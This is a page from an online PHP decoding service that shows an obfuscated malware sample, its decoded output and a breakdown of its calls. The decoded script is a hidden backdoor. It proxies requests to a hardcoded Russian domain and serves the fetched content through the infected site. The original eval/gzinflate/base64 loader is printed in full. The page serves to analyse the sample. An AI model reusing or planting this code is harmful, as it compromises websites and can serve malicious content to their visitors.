Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $YZMr491 = "sdhian(zmb5je/)fq0pcux28.w7k_r4;31t9g6*yovl";$LhPEp30 = $YZMr491[18].$YZ..

Decoded Output download

header('Content-Type: text/html; charset=UTF-8');
$p = 'p'; 
$host='sadasuduasdihaisdad.ru';
$path='/cache24102015-aks/';
if (strpos($_SERVER['HTTP_HOST'], "www.") === false)
{
$_SERVER['HTTP_HOST'] = $_SERVER['HTTP_HOST'];
}
else 
{
$_SERVER['HTTP_HOST'] = substr($_SERVER['HTTP_HOST'], 4);
}
$srvr=$_SERVER['HTTP_HOST'].'/aks-';

function GetRealIp()
{
 if (!empty($_SERVER['HTTP_CLIENT_IP'])) 
 {   $ip=$_SERVER['HTTP_CLIENT_IP'];}
 elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
 {  $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];}
 else
 {   $ip=$_SERVER['REMOTE_ADDR'];}
 return $ip;
} 

if(isset($_GET[$p])) 
{
$r = GetRealIp();
if (strpos($_SERVER["HTTP_USER_AGENT"], "IP: ")!==FALSE) $r = substr($_SERVER["HTTP_USER_AGENT"], strpos($_SERVER["HTTP_USER_AGENT"], "IP: ")+4);

$param=$_GET[$p];
if (strpos($param, '.js') !== false)
{
$ext='.js';
$param = str_replace('.js','',$param);
$srvr='';
}
else if(strpos($param, 'prokl-') !== false)
{
$ext='.php?tds-q='.urlencode(substr($param, strpos($param, "prokl-")+6));
$param='prokl';
$srvr='';
}
else if(strpos($param, '.css') !== false)
{
$ext='.css';
$param = str_replace('.css','',$param);
$srvr='';
}
else if(strpos($param, '.gif') !== false)
{
$ext='.gif';
$param = str_replace('.gif','',$param);
$srvr='';
}
else if(strpos($param, '.htm') !== false)
{
$ext='.htm';
$param 
= str_replace('.htm','',$param);
$srvr='';
}
else if(strpos($param, '.jpg') !== false)
{
$ext='.jpg';
$param = str_replace('.jpg','',$param);
$srvr='';
}
else if(strpos($param, '.ico') !== false)
{
$ext='.ico';
$param = str_replace('.ico','',$param);
$srvr='';
}
else if(strpos($param, '.png') !== false)
{
$ext='.png';
$param = str_replace('.png','',$param);
$srvr='';
}
else{
$rf=$_SERVER['HTTP_REFERER'];
$ext='.php?ip='.$r.'&ref='.$ref;
}
$out ='';
$buff = '';
if ($curl = curl_init())
		{
		curl_setopt($curl, CURLOPT_URL, 'http://'.$host.$path.$srvr.$param.$ext);
		curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
		curl_setopt($curl, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
		$out = curl_exec($curl);
		curl_close($curl);
		}else{
		$fp = fsockopen($host, 80, $errno, $errstr, 30);
if ($fp) {
    $out = "GET ".$path.$srvr.$param.$ext." HTTP/1.1
";
    $out .= "Host: ".$host."
";
	$out .= "User-Agent: ".$_SERVER['HTTP_USER_AGENT']."
";
    $out .= "Connection: Close

";
    fwrite($fp, $out);
    while (!feof($fp)) {
        $buff.=fgets($fp, 128);
    }
	$result = explode("

", $buff, 2);
	$out= $result[1];
    fclose($fp);
} 
	}
	echo $out;
	exit
	;	
}

Did this file decode correctly?

Original Code

<?php $YZMr491 = "sdhian(zmb5je/)fq0pcux28.w7k_r4;31t9g6*yovl";$LhPEp30 = $YZMr491[18].$YZMr491[29].$YZMr491[12].$YZMr491[36].$YZMr491[28].$YZMr491[29].$YZMr491[12].$YZMr491[18].$YZMr491[42].$YZMr491[4].$YZMr491[19].$YZMr491[12];$bQI599 = "\x65\x76al\x28".chr(103)."\x7A\x69n\x66\x6C\x61\x74\x65".chr(40)."\x62".chr(97)."".chr(115)."e6\x34".chr(95)."".chr(100)."".chr(101)."c\x6Fd\x65\x28";$YvON2803 = ")\x29\x29".chr(59)."";$WYvqrVo1039 = $bQI599."'nVZtb5tIEP5sS/4PG2Tdgg7jONerIlvoZCXkRUqTiOD2pDSyKF4CDQG6u5xTRfnvndk1jo8zac9fDN6ZeZ55ZpeZTVi4YNykR0UuWS4HwfeSjYlkT3KYyMdsQqIk5IJJdxacDA6pNel1+yVxCS3phMB7UgjpUhEuQlEtqlAs0iRMxSJcOLyiyjmUiUuHURgl7ODdaP9gf/TnIHwQQ7SmMTGF5GUhzP78xvM/ev4tPQuC6/nZ1U1A72xiLJdLx7CI67okDjPBrF73GWC3eUNaW9eB6KXXZRBM3gwW1RdIpi2Td5bG6Qv+D3e3Ojl0CMoGqKzXjas8kmmRk1MmfRZm56Wpcyeoeo89lvJ7k+vo4ty7DObn1/TOsiBZ8kwI6ael2+43gZQIamtH/Xt+cuV/mvrH3jG+IbaG3oL8H981/tZsfO/DVeDNp8fHtStnsuI5umG5CFYijc1UwBmCvE694LZfanG4ExzKvlGfliNhqNRm8G8+PQXhBh6M8+sxMaw91z2ZXtx4FlFYzS3cFvk/0H9Xm65OMQ8f3XX+jTyV1SbU+SqoRfYaRxW+JVeZJjUQJir5nLMyCyNmKqNNqa2t6htTh4zSjaMLVWzylbx4yAatlGVS/iUXYvAN3iuesTwqFsysS7QCaWAaGhOkv7esdcKupqK/nJkTifZSoK29FmjdpRjOfRq3UqKtnRKtO1FCi2ylRNsrZa/bJEX7TqRfy/v2Uwa2N44ZWHeiTKOilRJt7ZRo3YmyzNtVoq2dEq0/o1S9J242P9878XzPVxNj4xuCjkedPnfob5zF6pXFq1lQVJJo4P6XKo5xMNZzrR/BNwcL+JineSpNbLudzjP+qEVoiUUptaNNjmb+xdV1MIcH6E+kLMfDIZDhhHXUGHWUDkfrcjBBFPcmmO8FM/8y8KeXNyDNJpJX7KdB2ApVJ7Sb8/S1ScIQUTC6Aloke2KRxtqgiLJCsM3Vl1X9ITbGm0QsiuihKFluKqk2OdwHXsZ5Xugn7K5N/tivhwNEWQTHKA4jzW5AWyZGW5Ecg2Dyw5Ez+sw/58ZkI9aB4DNgHWO4qrRR+3TWDjPB+GB6D9cj5dZektfgfxHA3Spn6i4wJkdYDvTa9IyXPJUMldkqylqtL5M0YzDVY1bESvdauMLHE+e48T2TQseODg7r0BcUwJmoMiwQeyoz7P3GmtnW4TY5sGqtcHvSAbejuzqx1e4B9WqadxCYRUmhEsVQ9pRKeEw64PAD'".$YvON2803;$LhPEp30($YZMr491[13].$YZMr491[24].$YZMr491[38].$YZMr491[13].$YZMr491[12], $WYvqrVo1039  ,"981");

Function Calls

chr 8
gzinflate 2
preg_replace 1
base64_decode 2

Variables

$bQI599 eval(gzinflate(base64_decode(
$LhPEp30 preg_replace
$YZMr491 sdhian(zmb5je/)fq0pcux28.w7k_r4;31t9g6*yovl
$YvON2803 )));
$WYvqrVo1039 eval(gzinflate(base64_decode('nVZtb5tIEP5sS/4PG2Tdgg7jONerIl..

Stats

MD5 be07b0ee2f1e547a63fe0d7a30637e8b
Eval Count 3
Decode Time 148 ms